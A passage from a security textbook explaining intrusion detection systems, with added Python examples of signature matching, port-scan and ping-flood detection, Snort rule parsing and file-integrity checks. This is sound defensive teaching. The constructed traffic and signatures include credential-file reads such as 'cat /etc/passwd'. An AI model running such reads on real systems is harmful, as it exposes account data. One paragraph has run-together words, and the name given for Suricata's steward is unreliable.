• Identify a ping flood attack. A single ICMP packet on its own is generally regarded as harmless, certainly not worthy of an IDS signature. Yet thousands of ICMP packets coming to a single system in a short period of time can have a devastating effect on the receiving system. By flooding a system with thousands of valid ICMP packets, an attacker can keep a target system so busy it doesn't have time to do anything else: a very effective denial-of-service attack. To identify a ping flood, the IDS must recognize each ICMP packet and keep track of how many ICMP packets different systems have received in the recent past.

Exam Tip: Know the differences between content-based and context-based signatures. Content-based signatures match specific content, such as a certain string or series of characters (matching the string /etc/passwd in an FTP session). Context-based signatures match a pattern of activity based on the other activity around it, such as a port scan.
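Here is an added Python illustration (not the book's code, and not any product's engine) of how an analysis engine applies the two kinds of signature described above. The Telnet /etc/passwd and sendmail "to: decode" content signatures match on a single event, while the port-80 sweep and ping-flood context signatures need the engine to remember earlier events inside a time window. It also includes the per-host exclusion described under tuning in the IDS Overview. The event records are constructed in the code, and the thresholds and window sizes are arbitrary.

```python
"""Added example (not the book's or any vendor's code): a miniature IDS
analysis engine driving content-based and context-based signatures over a
constructed event stream, with a per-host tuning exclusion.  Thresholds and
window sizes are arbitrary choices for the illustration."""
from collections import defaultdict

# Content-based signatures: a byte pattern inside one event's payload.
CONTENT_SIGNATURES = [
    {"name": "telnet-etc-passwd", "proto": "tcp", "dport": 23, "pattern": b"/etc/passwd"},
    {"name": "sendmail-decode-alias", "proto": "tcp", "dport": 25, "pattern": b"to: decode"},
]
# Context-based signatures need memory of earlier events; these are their limits.
PORTSCAN_DISTINCT_HOSTS = 5     # one source touching this many distinct hosts on port 80...
PORTSCAN_WINDOW = 10.0          # ...within this many seconds
PINGFLOOD_PACKETS = 100         # ICMP packets to one destination...
PINGFLOOD_WINDOW = 1.0          # ...within this many seconds


class AnalysisEngine:
    def __init__(self, ignore_hosts=()):
        # Tuning hook: sources whose traffic looks hostile but is known benign
        # (for example your own vulnerability scanner) never raise alarms.
        self.ignore_hosts = set(ignore_hosts)
        self.web_targets = defaultdict(list)   # src -> [(ts, dst)] port-80 attempts
        self.icmp_seen = defaultdict(list)     # dst -> [ts] of ICMP packets
        self.alarms = []                       # alarm storage
        self._alerted = set()                  # (signature, key) already raised

    def process(self, ev):
        """ev: dict with ts, proto, src, dst, plus dport/payload for TCP."""
        if ev["src"] in self.ignore_hosts:
            return []
        new = self._content_match(ev) + self._portscan(ev) + self._pingflood(ev)
        self.alarms.extend(new)
        return new

    def _content_match(self, ev):
        payload = ev.get("payload", b"").lower()
        return [(sig["name"], ev["src"], ev["dst"]) for sig in CONTENT_SIGNATURES
                if ev["proto"] == sig["proto"] and ev.get("dport") == sig["dport"]
                and sig["pattern"] in payload]

    def _portscan(self, ev):
        if ev["proto"] != "tcp" or ev.get("dport") != 80:
            return []
        hist = self.web_targets[ev["src"]]
        hist.append((ev["ts"], ev["dst"]))
        hist[:] = [(t, d) for t, d in hist if ev["ts"] - t <= PORTSCAN_WINDOW]
        distinct = {d for _, d in hist}
        key = ("web-portscan", ev["src"])
        if len(distinct) >= PORTSCAN_DISTINCT_HOSTS and key not in self._alerted:
            self._alerted.add(key)
            return [("web-portscan", ev["src"], "%d hosts" % len(distinct))]
        return []

    def _pingflood(self, ev):
        if ev["proto"] != "icmp":
            return []
        hist = self.icmp_seen[ev["dst"]]
        hist.append(ev["ts"])
        hist[:] = [t for t in hist if ev["ts"] - t <= PINGFLOOD_WINDOW]
        key = ("ping-flood", ev["dst"])
        if len(hist) >= PINGFLOOD_PACKETS and key not in self._alerted:
            self._alerted.add(key)
            return [("ping-flood", ev["src"], ev["dst"])]
        return []


def run_sample():
    """Constructed stream: a benign ping, a Telnet read of /etc/passwd, a port-80
    sweep from 203.0.113.5, a ping flood, then the same sweep from an internal
    scanner that tuning excludes.  Returns the names of the alarms raised."""
    events = [
        {"ts": 0.0, "proto": "icmp", "src": "10.0.0.7", "dst": "10.0.0.1"},
        {"ts": 1.0, "proto": "tcp", "src": "203.0.113.5", "dst": "10.0.0.20",
         "dport": 23, "payload": b"cat /etc/passwd\r\n"},
    ]
    events += [{"ts": 2.0 + i * 0.1, "proto": "tcp", "src": "203.0.113.5",
                "dst": "10.0.0.%d" % (30 + i), "dport": 80} for i in range(6)]
    events += [{"ts": 5.0 + i * 0.005, "proto": "icmp", "src": "198.51.100.9",
                "dst": "10.0.0.1"} for i in range(120)]
    events += [{"ts": 20.0 + i * 0.1, "proto": "tcp", "src": "10.0.0.250",
                "dst": "10.0.0.%d" % (30 + i), "dport": 80} for i in range(6)]
    engine = AnalysisEngine(ignore_hosts={"10.0.0.250"})
    for ev in events:
        engine.process(ev)
    return [alarm[0] for alarm in engine.alarms]


if __name__ == "__main__":
    print(run_sample())    # expected: ['telnet-etc-passwd', 'web-portscan', 'ping-flood']
```

Note where the cost lives: the content signatures are stateless, while the two context signatures keep a per-source and per-destination history that the engine has to prune on every event, which is the "remembering" the text says makes context signatures more expensive to match. A single request below the scan threshold, or a scanner that spreads its probes over more than the window, produces no alarm at all, which is the false-negative side of any fixed threshold.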
Tofunction,theIDSmusthaveadecentsignaturebasewithexamplesofknown,undesirableactivitythatitcanusewhenanalyzingtrafficor
events.AnytimeanIDSmatchescurrenteventsagainstasignature,theIDScouldbeconsideredsuccessful,asithascorrectlymatchedthecurrenteventagainstaknownsignatureandreactedaccordingly(usuallywithanalarmoralertofsometype).
FalsePositivesandFalseNegativesViewedinitssimplestform,anIDSisreallyjustlookingatactivity(beithost-basedornetwork-based)andmatchingitagainstapredefinedsetofpatterns.Whenitmatchesactivitytoaspecificpattern,theIDScannotknowthetrueintentbehindthatactivity—whetheritisbenignorhostile—andthereforeitcanreactonlyasithasbeenprogrammedtodo.Inmostcases,thismeansgeneratinganalertthatmustthenbeanalyzedbyahumanwhotriestodeterminetheintentofthetrafficfromwhateverinformationisavailable.WhenanIDSmatchesapatternandgeneratesanalarmforbenigntraffic,meaningthetrafficwasnothostileandnotathreat,thisiscalledafalsepositive.Inotherwords,theIDSmatchedapatternandraisedanalarmwhenitdidn’treallyneedtodoso.KeepinmindthattheIDScanonlymatchpatternsandhasnoabilitytodetermineintentbehindtheactivity,soinsomewaysthisisanunfairlabel.Technically,theIDSisfunctioningcorrectlybymatchingthepattern,butfromahumanstandpointthisisnotinformationtheanalystneededtosee,asitdoesnotconstituteathreatanddoesnotrequireintervention.
Toreducethegenerationoffalsepositives,mostadministratorstunetheIDS.“Tuning”anIDSistheprocessofconfiguringtheIDSsothatitworksinyourspecificenvironment—generatingalarmsformalicioustrafficandnotgeneratingalarmsfortrafficthatis“normal”foryournetwork.EffectivelytuninganIDScanresultinsignificantreductionsinfalse-positivetraffic.
AnIDSisalsolimitedbyitssignatureset—itcanmatchonlyactivityforwhichithasstoredpatterns.HostileactivitythatdoesnotmatchanIDSsignatureandthereforegoesundetectediscalledafalsenegative.Inthis
case,theIDSisnotgeneratinganyalarms,eventhoughitshouldbe,givingafalsesenseofsecurity.
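The following is an added example, not code from the book: a toy analysis engine with one content-based signature (the /etc/passwd string in an FTP session) and one context-based signature (the ping-flood counter described above), run over a constructed packet list and scored against constructed analyst labels so that "false positive" and "false negative" get concrete counts. It then shows what tuning does: the same traffic with a sharper string match and the monitoring station whitelisted. All addresses, timestamps and payloads are made up for the example.

```python
"""Added example: toy NIDS signatures scored for false positives/negatives,
before and after tuning. All traffic below is constructed, not captured."""
import re
from collections import defaultdict, deque

# Constructed packet records: (time_ms, src, dst, proto, dport, payload)
PACKETS = (
    [(0, "10.0.0.5", "10.0.0.9", "tcp", 21, b"RETR /etc/passwd\r\n"),               # hostile
     (500, "10.0.0.7", "10.0.0.9", "tcp", 21, b"RETR /etc/passwd-policy.txt\r\n"),  # benign, similar bytes
     (900, "10.0.0.7", "10.0.0.9", "tcp", 80, b"GET /admin HTTP/1.1\r\n")]          # hostile, no signature
    # 200 ICMP echo requests from one host to one target within two seconds
    + [(2000 + i * 10, "10.0.0.66", "10.0.0.9", "icmp", None, b"") for i in range(200)]
    # 40 echo requests from the monitoring station: normal for this network
    + [(5000 + i * 50, "10.0.0.2", "10.0.0.9", "icmp", None, b"") for i in range(40)]
)

# Constructed analyst ground truth: (attack, source) pairs that really are hostile.
HOSTILE = {("passwd-retrieval", "10.0.0.5"),
           ("ping-flood", "10.0.0.66"),
           ("admin-probe", "10.0.0.7")}


class ContentSignature:
    """Content-based: a byte pattern inside packets of one service (FTP, port 21)."""
    name = "passwd-retrieval"

    def __init__(self, pattern):
        self.pattern = re.compile(pattern)

    def match(self, pkt):
        _, _, _, proto, dport, payload = pkt
        return proto == "tcp" and dport == 21 and self.pattern.search(payload) is not None


class PingFloodSignature:
    """Context-based: more than `threshold` ICMP packets to one destination
    within `window_ms`, ignoring whitelisted sources."""
    name = "ping-flood"

    def __init__(self, threshold, window_ms=1000, ignore_sources=()):
        self.threshold, self.window_ms = threshold, window_ms
        self.ignore_sources = set(ignore_sources)
        self.recent = defaultdict(deque)   # dst -> timestamps of recent ICMP packets

    def match(self, pkt):
        t, src, dst, proto, _, _ = pkt
        if proto != "icmp" or src in self.ignore_sources:
            return False
        q = self.recent[dst]
        q.append(t)
        while t - q[0] > self.window_ms:   # drop packets that fell out of the window
            q.popleft()
        return len(q) > self.threshold


def run_ids(packets, signatures):
    """Return the distinct (signature name, source) alarms raised over the traffic."""
    alarms = set()
    for pkt in packets:
        for sig in signatures:
            if sig.match(pkt):
                alarms.add((sig.name, pkt[1]))
    return alarms


def score(alarms, hostile=HOSTILE):
    """True positives, false positives (alarm but benign) and false negatives (hostile, no alarm)."""
    return {"tp": len(alarms & hostile), "fp": len(alarms - hostile), "fn": len(hostile - alarms)}


def untuned():
    # A loose string match and a low ICMP threshold, as a default rule set might ship.
    return score(run_ids(PACKETS, [ContentSignature(rb"/etc/passwd"), PingFloodSignature(20)]))


def tuned():
    # Tuning for this network: the path must end right after "passwd", and the
    # monitoring station, which pings hosts all day, is whitelisted.
    sigs = [ContentSignature(rb"/etc/passwd(?=\s|$)"),
            PingFloodSignature(20, ignore_sources={"10.0.0.2"})]
    return score(run_ids(PACKETS, sigs))


if __name__ == "__main__":
    print("untuned:", untuned())   # {'tp': 2, 'fp': 2, 'fn': 1}
    print("tuned:  ", tuned())     # {'tp': 2, 'fp': 0, 'fn': 1}
```

Tuning removes both false positives but cannot touch the false negative: the /admin probe has no signature, so no amount of tuning will surface it, which is the point the text makes about the signature set being a hard limit.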
Network-Based IDSs
Network-based IDSs (NIDSs) actually came along a few years after host-based systems. After running host-based systems for a while, many organizations grew tired of the time, energy, and expense involved with managing the first generation of these systems—the host-based systems were not centrally managed, there was no easy way to correlate alerts between systems, and false-positive rates were high. The desire for a "better way" grew along with the amount of interconnectivity between systems and, consequently, the amount of malicious activity coming across the networks themselves. This fueled development of a new breed of IDS designed to focus on the source for a great deal of the malicious traffic—the network itself.
Tech Tip: Network Visibility
A network IDS has to be able to see traffic to find the malicious traffic. Encrypted traffic such as SSH or HTTPS sessions must be decrypted before a network IDS can examine them.
The NIDS integrated very well into the concept of perimeter security. More and more companies began to operate their computer security like a castle or military base (see Figure 13.3), with attention and effort focused on securing and controlling the ways in and out—the idea being that if you could restrict and control access at the perimeter, you didn't have to worry as much about activity inside the organization. Even though the idea of a security perimeter is somewhat flawed (many security incidents originate inside the perimeter), it caught on very quickly, as it was easy to understand and devices such as firewalls, bastion hosts, and routers were available to define and secure that perimeter. The best way to secure the perimeter from outside attack is to reject all traffic from external entities, but this is impossible and impractical to do, so security personnel needed a way to let traffic in but still be able to determine whether or not the traffic was malicious. This is the problem that NIDS developers were trying to solve.
• Figure 13.3 Network perimeters are a little like castles—firewalls and NIDSs form the gates and guards to keep malicious traffic out.
As its name suggests, a NIDS focuses on network traffic—the bits and bytes traveling along the cables and wires that interconnect the systems. A NIDS must examine the network traffic as it passes by and be able to analyze traffic according to protocol, type, amount, source, destination, content, traffic already seen, and other factors. This analysis must happen quickly, and the NIDS must be able to handle traffic at whatever speed the network operates to be effective. NIDSs are typically deployed so that they can monitor traffic in and out of an organization's major links: connections to the Internet, remote offices, partners, and so on. Like host-based systems, NIDSs look for certain activities that typify hostile actions or misuse, such as the following:
Denial-of-service attacks
Port scans or sweeps
Malicious content in the data payload of a packet or packets
Vulnerability scanning
Trojans, viruses, or worms
Tunneling
Brute-force attacks
In general, most NIDSs operate in a fairly similar fashion. Figure 13.4 shows the logical layout of a NIDS. By considering the function and activity of each component, you can gain some insight into how a NIDS operates.
• Figure 13.4 Network IDS components
In the simplest form, a NIDS has the same major components: traffic collector, analysis engine, reports, and a user interface. In a NIDS, the traffic collector is specifically designed to pull traffic from the network. This component usually behaves in much the same way as a network traffic sniffer—it simply pulls every packet it can see off the network to which it is connected. In a NIDS, the traffic collector will logically attach itself to a network interface card (NIC) and instruct the NIC to accept every packet it can. A NIC that accepts and processes every packet regardless of the packet's origin and destination is said to be in promiscuous mode.
Tech Tip: Another Way to Look at NIDSs
In its simplest form, a NIDS is a lot like a motion detector and a video surveillance system rolled into one. The NIDS notes the undesirable activity, generates an alarm, and records what happens.
The analysis engine in a NIDS serves the same function as its host-based counterpart, with some substantial differences. The network analysis engine must be able to collect packets and examine them individually or, if necessary, reassemble them into an entire traffic session. The patterns and signatures being matched are far more complicated than host-based signatures, so the analysis engine must be able to remember what traffic preceded the traffic currently being analyzed so that it can determine whether or not that traffic fits into a larger pattern of malicious activity. Additionally, the network-based analysis engine must be able to keep up with the flow of traffic on the network, rebuilding network sessions and matching patterns in real time.
Cross Check: NIDS and Encrypted Traffic
You learned about encrypted traffic in Chapter 5, so check your memory with these questions. What is SSH? What is a one-time pad? Can you name at least three different algorithms?
The NIDS signature database is usually much larger than that of a host-based system. When examining network patterns, the NIDS must be able to recognize traffic targeted at many different applications and operating systems as well as traffic from a wide variety of threats (worms, assessment tools, attack tools, and so on). Some of the signatures themselves can be quite large, as the NIDS must look at network traffic occurring in a specific order over a period of time to match a particular malicious pattern.
Using the lessons learned from early host-based systems, NIDS developers modified the logical component design somewhat to distribute the user interface and reporting functions. As many companies had more than one network link, they would need an IDS capable of handling multiple links in many different locations. The early IDS vendors solved this dilemma by dividing the components and assigning them to separate entities. The traffic collector, analysis engine, and signature database were bundled into a single entity, usually called a sensor or appliance. The sensors would report to and be controlled by a central system or master console. This central system, shown in Figure 13.5, consolidated alarms and provided the user interface and reporting functions that allowed users in one location to manage, maintain, and monitor sensors deployed in a variety of remote locations.
• Figure 13.5 Distributed network IDS components
By creating separate components designed to work together, the NIDS developers were able to build a more capable and flexible system. With encrypted communications, network sensors could be placed around both local and remote perimeters and still be monitored and managed securely from a central location. Placement of the sensors very quickly became an issue for most security personnel, as the sensors obviously had to have visibility of the network traffic in order to analyze it. Because most organizations with NIDSs also had firewalls, location of the NIDS relative to the firewall had to be considered as well. Placed before the firewall, as shown in Figure 13.6, the NIDS will see all traffic coming in from the Internet, including attacks against the firewall itself. This includes traffic that the firewall stops and does not permit into the corporate network. With this type of deployment, the NIDS sensor will generate a large number of alarms (including alarms for traffic that the firewall would stop). This tends to overwhelm the human operators managing the system.
• Figure 13.6 NIDS sensor placed in front of firewall
Placed after the firewall, as shown in Figure 13.7, the NIDS sensor sees and analyzes the traffic that is being passed through the firewall and into the corporate network. While this does not allow the NIDS to see attacks against the firewall, it generally results in far fewer alarms and is the most popular placement for NIDS sensors.
• Figure 13.7 NIDS sensor placed behind firewall
As you already know, NIDSs examine the network traffic for suspicious or malicious activity. Here are two examples of suspicious traffic to illustrate the operation of a NIDS:
Port scan A port scan is a reconnaissance activity a potential attacker uses to find out information about the systems he wants to attack. Using any of a number of tools, the attacker attempts to connect to various services (web, FTP, SMTP, and so on) to see if they exist on the intended target. In normal network traffic, a single user might connect to the FTP service provided on a single system. During a port scan, an attacker may attempt to connect to the FTP service on every system. As the attacker's traffic passes by the IDS, the IDS will notice this pattern of attempting to connect to different services on different systems in a relatively short period of time. When the IDS compares the activity to its signature database, it will very likely match this traffic against the port scanning signature and generate an alarm.
Ping of death Toward the end of 1996, it was discovered that certain operating systems, such as Windows, could be crashed by sending a very large Internet Control Message Protocol (ICMP) echo request packet to that system. This is a fairly simple traffic pattern for a NIDS to identify, as it simply has to look for ICMP packets over a certain size.
Port scanning activity is rampant on the Internet. Most organizations with NIDSs see hundreds or thousands of port scan alarms every day from sources around the world. Some administrators reduce the alarm level of port scan alarms or ignore port scanning traffic because there is simply too much traffic to track down and respond to each alarm.
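An added example (not the book's code) of the two detections just described, generalised slightly: the port scan signature counts distinct (host, port) targets one source touches inside a sliding window and labels the pattern a sweep (one port, many hosts) or a scan (many ports, one host), and the ping-of-death signature simply compares the reassembled ICMP packet length against the largest valid IPv4 datagram. The packet records, addresses and the 65,535-byte limit used for the size check are assumptions of the example; the sensor would have to reassemble fragments before the length is known.

```python
"""Added example: context-based port scan/sweep detection and an oversized-ICMP
check. Packet records are constructed, not captured."""
from collections import defaultdict, deque

IP_MAX_LEN = 65535   # largest valid IPv4 datagram; a bigger reassembled ICMP packet is malformed

# Constructed packets: (time_ms, src, dst, proto, dport, total_len_after_reassembly)
TRAFFIC = (
    # one user opening one FTP session: ordinary traffic
    [(0, "10.0.0.7", "10.0.0.20", "tcp", 21, 60)]
    # one source touching port 21 on 30 different hosts within one second: a sweep
    + [(1000 + i * 20, "10.0.0.66", f"10.0.0.{100 + i}", "tcp", 21, 60) for i in range(30)]
    # the same source later probing 15 ports on a single host: a scan
    + [(5000 + i * 10, "10.0.0.66", "10.0.0.20", "tcp", p, 60) for i, p in enumerate(range(20, 35))]
    # a reassembled ICMP echo request larger than any valid IPv4 datagram
    + [(9000, "10.0.0.99", "10.0.0.20", "icmp", None, 65536)]
    # a normal 84-byte ping
    + [(9100, "10.0.0.7", "10.0.0.20", "icmp", None, 84)]
)


class PortScanDetector:
    """Alarm when one source contacts more than `max_targets` distinct
    (destination, port) pairs inside a sliding window of `window_ms`."""

    def __init__(self, max_targets=10, window_ms=2000):
        self.max_targets, self.window_ms = max_targets, window_ms
        self.seen = defaultdict(deque)      # src -> deque of (time, (dst, dport))

    def observe(self, pkt):
        t, src, dst, proto, dport, _ = pkt
        if proto != "tcp":
            return None
        q = self.seen[src]
        q.append((t, (dst, dport)))
        while t - q[0][0] > self.window_ms:   # forget contacts outside the window
            q.popleft()
        distinct = {target for _, target in q}
        if len(distinct) <= self.max_targets:
            return None
        hosts = {d for d, _ in distinct}
        ports = {p for _, p in distinct}
        kind = "port-sweep" if len(hosts) > len(ports) else "port-scan"
        return (kind, src)


def oversized_icmp(pkt):
    """Ping-of-death style check: ICMP packet longer than the IPv4 maximum."""
    _, src, _, proto, _, total_len = pkt
    if proto == "icmp" and total_len > IP_MAX_LEN:
        return ("ping-of-death", src)
    return None


def analyze(packets):
    """Run both signatures over the traffic; return the distinct (alarm, source) pairs."""
    scanner = PortScanDetector()
    alarms = set()
    for pkt in packets:
        for hit in (scanner.observe(pkt), oversized_icmp(pkt)):
            if hit:
                alarms.add(hit)
    return alarms


if __name__ == "__main__":
    for alarm in sorted(analyze(TRAFFIC)):
        print(alarm)
```

The single FTP connection from 10.0.0.7 never crosses the threshold, which is the benign case the text contrasts with the scan; lowering `max_targets` or widening the window is exactly the trade-off that produces the flood of port scan alarms mentioned above.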
Advantages of a NIDS
A NIDS has certain advantages that make it a good choice for certain situations:
Providing IDS coverage requires fewer systems. With a few well-placed NIDS sensors, you can monitor all the network traffic going in and out of your organization. Fewer sensors usually equates to less overhead and maintenance, meaning you can protect the same number of systems at a lower cost.
Deployment, maintenance, and upgrade costs are usually lower. The fewer systems that have to be managed and maintained to provide IDS coverage, the lower the cost to operate the IDS. Upgrading and maintaining a few sensors is usually much cheaper than upgrading and maintaining hundreds of host-based processes.
A NIDS has visibility into all network traffic and can correlate attacks among multiple systems. Well-placed NIDS sensors can see the "big picture" when it comes to network-based attacks. The network sensors can tell you whether attacks are widespread and unorganized or focused and concentrated on specific systems.
Disadvantages of a NIDS
A NIDS has certain disadvantages:
It is ineffective when traffic is encrypted. When network traffic is encrypted from application to application or system to system, a NIDS sensor will not be able to examine that traffic. With the increasing popularity of encrypted traffic, this is becoming a bigger problem for effective IDS operations.
It can't see traffic that does not cross it. The IDS sensor can examine only traffic crossing the network link it is monitoring. With most IDS sensors being placed on perimeter links, traffic traversing the internal network is never seen.
It must be able to handle high volumes of traffic. As network speeds continue to increase, the network sensors must be able to keep pace and examine the traffic as quickly as it can pass the network. When NIDSs were introduced, 10-Mbps networks were the norm. Now 100-Mbps and even 1-Gbps networks are commonplace. This increase in traffic speeds means IDS sensors must be faster and more powerful than ever before.
It doesn't know about activity on the hosts themselves. NIDSs focus on network traffic. Activity that occurs on the hosts themselves will not be seen by a NIDS.
Tech Tip: TCP Reset
The most common defensive ability for an active NIDS is to send a TCP reset message. Within TCP, the reset message (RST) essentially tells both sides of the connection to drop the session and stop communicating immediately. While this mechanism was originally developed to cover situations such as systems accidentally receiving communications intended for other systems, the reset message works fairly well for NIDSs—with one serious drawback: a reset message affects only the current session. Nothing prevents the attacker from coming back and trying again and again. Despite the "temporariness" of this solution, sending a reset message is usually the only defensive measure implemented on NIDS deployments, as the fear of blocking legitimate traffic and disrupting business processes, even for a few moments, often outweighs the perceived benefit of discouraging potential intruders.
Active vs. Passive NIDSs
Most NIDSs can be distinguished by how they examine the traffic and whether or not they interact with that traffic. On a passive system, the NIDS simply watches the traffic, analyzes it, and generates alarms. It does not interact with the traffic itself in any way, and it does not modify the defensive posture of the system to react to the traffic. A passive NIDS is very similar to a simple motion sensor—it generates an alarm when it matches a pattern, much as the motion sensor generates an alarm when it sees movement. An active NIDS contains all the same components and capabilities of the passive NIDS with one critical addition—the active NIDS can react to the traffic it is analyzing. These reactions can range from something simple, such as sending a TCP reset message to interrupt a potential attack and disconnect a session, to something complex, such as dynamically modifying firewall rules to reject all traffic from specific source IP addresses for the next 24 hours.
NIDS Tools
There are numerous examples of NIDS tools in the marketplace, from open source projects to commercial entries. Snort has been the de facto standard IDS engine since its creation in 1998. It has a large user base and set the standard for many IDS elements, including rule sets and formats. Snort rules are the list of activities that Snort will alert on and provide the flexible power behind the IDS platform. Snort rule sets are updated by a large active community as well as by the Sourcefire Vulnerability Research Team (Sourcefire being the company behind Snort). Snort VRT rule sets are available to subscribers and provide such elements as same-day protection for items such as Microsoft Patch Tuesday vulnerabilities. These rules are moved to the open community after 30 days. A newer entrant to the IDS marketplace is Suricata. Suricata is an open source IDS, begun with grant money from the U.S. government and maintained by the Open Source Security Foundation (OSIF). Suricata has one advantage over Snort: it supports multithreading, while Snort only supports single-threaded operation. Both of these systems are highly flexible and scalable, operating on both Windows and Linux platforms.
Tech Tip: Snort Rules
The basic format for Snort rules is a rule header followed by rule options.
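To make the header/options split concrete, here is an added example (not Snort's own code, nor a rule from any Snort or VRT rule set): a small parser that takes a rule written in Snort syntax and separates the seven header fields (action, protocol, source, source port, direction, destination, destination port) from the option list in parentheses. The sample rule is constructed for this example; its `sid` is in the range Snort reserves for locally written rules.

```python
"""Added example: split a Snort rule into its header fields and its options.
The sample rule is constructed for illustration, not taken from any rule set."""
import re

SAMPLE_RULE = ('alert tcp $EXTERNAL_NET any -> $HOME_NET 21 '
               '(msg:"FTP /etc/passwd retrieval attempt"; flow:to_server,established; '
               'content:"/etc/passwd"; nocase; classtype:attempted-recon; sid:1000001; rev:1;)')

HEADER_FIELDS = ("action", "protocol", "src", "src_port", "direction", "dst", "dst_port")


def _split_options(body):
    """Split the option body on ';', ignoring semicolons inside double-quoted arguments."""
    parts, current, in_quotes = [], [], False
    for ch in body:
        if ch == '"':
            in_quotes = not in_quotes
        if ch == ";" and not in_quotes:
            if "".join(current).strip():
                parts.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
    if "".join(current).strip():
        parts.append("".join(current).strip())
    return parts


def parse_rule(text):
    """Return (header dict, list of (keyword, argument) options).
    A keyword with no argument (e.g. nocase) is stored with argument None."""
    m = re.fullmatch(r"(?P<header>[^(]+)\((?P<options>.*)\)", text.strip(), re.DOTALL)
    if m is None:
        raise ValueError("rule needs a header followed by a parenthesised option list")
    tokens = m.group("header").split()
    if len(tokens) != len(HEADER_FIELDS):
        raise ValueError(f"expected {len(HEADER_FIELDS)} header fields, got {len(tokens)}")
    header = dict(zip(HEADER_FIELDS, tokens))
    if header["direction"] not in ("->", "<>"):
        raise ValueError("direction operator must be -> or <>")
    options = []
    for chunk in _split_options(m.group("options")):
        keyword, _, argument = chunk.partition(":")
        options.append((keyword.strip(), argument.strip().strip('"') if argument else None))
    return header, options


if __name__ == "__main__":
    header, options = parse_rule(SAMPLE_RULE)
    print(header)
    for keyword, argument in options:
        print(f"  {keyword}: {argument}")
```

The header is what the engine uses to decide whether a packet is even a candidate (protocol, direction, ports); the options carry the content match, flow state and bookkeeping such as `sid` and `rev`, which is where the bulk of a signature's meaning lives.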
Host-Based IDSs
The very first IDSs were host-based and designed to examine activity only on a specific host. A host-based IDS (HIDS) examines log files, audit trails, and network traffic coming into or leaving a specific host. HIDSs can operate in real time, looking for activity as it occurs, or in batch mode, looking for activity on a periodic basis. Host-based systems are typically self-contained, but many of the newer commercial products have been designed to report to and be managed by a central system. Host-based systems also take local system resources to operate. In other words, a HIDS will use up some of the memory and CPU cycles of the system it is protecting. Early versions of HIDSs ran in batch mode, looking for suspicious activity on an hourly or daily basis, and typically looked only for specific events in the system's log files. As processor speeds increased, later versions of HIDSs looked through the log files in real time and even added the ability to examine the data traffic the host was generating and receiving.
Most HIDSs focus on the log files or audit trails generated by the local operating system. On UNIX systems, the examined logs usually include those created by syslog, such as messages, kernel logs, and error logs. On Windows systems, the examined logs are typically the three event logs: Application, System, and Security. Some HIDSs can cover specific applications, such as FTP or web services, by examining the logs produced by those specific applications or examining the traffic from the services themselves. Within the log files, the HIDS is looking for certain activities that typify hostile actions or misuse, such as the following:
Logins at odd hours
Login authentication failures
Additions of new user accounts
Modification or access of critical system files
Modification or removal of binary files (executables)
Starting or stopping processes
Privilege escalation
Use of certain programs
In general, most HIDSs operate in a very similar fashion. (Figure 13.8 shows the logical layout of a HIDS.) By considering the function and activity of each component, you can gain some insight into how HIDSs operate.
• Figure 13.8 Host-based IDS components
As on any IDS, the traffic collector on a HIDS pulls in the information the other components, such as the analysis engine, need to examine. For most HIDSs, the traffic collector pulls data from information the local system has already generated, such as error messages, log files, and system files. The traffic collector is responsible for reading those files, selecting which items are of interest, and forwarding them to the analysis engine. On some HIDSs, the traffic collector also examines specific attributes of critical files, such as file size, date modified, or checksum.
Critical files are those that are vital to the system's operation or overall functionality. They may be program (or binary) files, files containing user accounts and passwords, or even scripts to start or stop system processes. Any unexpected modifications to these files could mean the system has been compromised or modified by an attacker. By monitoring these files, the HIDS can warn users of potentially malicious activity.
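The critical-file check described above, as an added example rather than any product's code: a baseline of size, modification time and SHA-256 checksum is taken for a set of files, and a later snapshot is compared against it to report files that were modified, merely touched, or removed. The "critical files" here are three small files created in a temporary directory for the example; the names (passwd, rc.local, login) and their contents are constructed.

```python
"""Added example: file-integrity baseline and comparison, the critical-file
check a HIDS traffic collector performs. All files are constructed in a temp dir."""
import hashlib
import os
import tempfile


def snapshot(paths):
    """Return {path: (size, mtime_ns, sha256 hex)}; a missing file maps to None."""
    result = {}
    for path in paths:
        if not os.path.isfile(path):
            result[path] = None
            continue
        st = os.stat(path)
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
        result[path] = (st.st_size, st.st_mtime_ns, h.hexdigest())
    return result


def compare(baseline, current):
    """Classify each baselined path as unchanged, modified, touched, missing or created."""
    findings = {}
    for path, old in baseline.items():
        new = current.get(path)
        if new is None:
            findings[path] = "missing"
        elif old is None:
            findings[path] = "created"
        elif old[2] != new[2]:
            findings[path] = "modified"   # checksum differs: the contents changed
        elif old[:2] != new[:2]:
            findings[path] = "touched"    # same bytes, but size/mtime bookkeeping moved
        else:
            findings[path] = "unchanged"
    return findings


def demo():
    """Constructed scenario: baseline three 'critical' files, then append to one,
    delete another and leave the third alone."""
    with tempfile.TemporaryDirectory() as d:
        passwd = os.path.join(d, "passwd")
        rc = os.path.join(d, "rc.local")
        binary = os.path.join(d, "login")
        for p, content in ((passwd, b"root:x:0:0::/root:/bin/sh\n"),
                           (rc, b"#!/bin/sh\nexit 0\n"),
                           (binary, b"\x7fELF" + bytes(60))):
            with open(p, "wb") as f:
                f.write(content)
        baseline = snapshot([passwd, rc, binary])

        with open(passwd, "ab") as f:            # an extra uid-0 account appended
            f.write(b"eve:x:0:0::/root:/bin/sh\n")
        os.remove(rc)                             # a startup script removed

        findings = compare(baseline, snapshot([passwd, rc, binary]))
        return {os.path.basename(p): v for p, v in findings.items()}


if __name__ == "__main__":
    print(demo())   # {'passwd': 'modified', 'rc.local': 'missing', 'login': 'unchanged'}
```

The baseline itself is a critical file by the same reasoning the text applies to alarms: if it lives on the monitored host, an intruder who can alter the binaries can also alter the baseline, so it belongs on a separate system or in read-only storage.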
The analysis engine is perhaps the most important component of the HIDS, as it must decide what activity is "okay" and what activity is "bad." The analysis engine is a sophisticated decision and pattern-matching mechanism—it looks at the information provided by the traffic collector and tries to match it against known patterns of activity stored in the signature database. If the activity matches a known pattern, the analysis engine can react, usually by issuing an alert or alarm. An analysis engine may also be capable of remembering how the activity it is looking at right now compares to traffic it has already seen or may see in the near future, so that it can match more complicated, multistep malicious activity patterns. An analysis engine must also be capable of examining traffic patterns as quickly as possible, as the longer it takes to match a malicious pattern, the less time the HIDS or human operator has to react to malicious traffic. Most HIDS vendors build a decision tree into their analysis engines to expedite pattern matching.
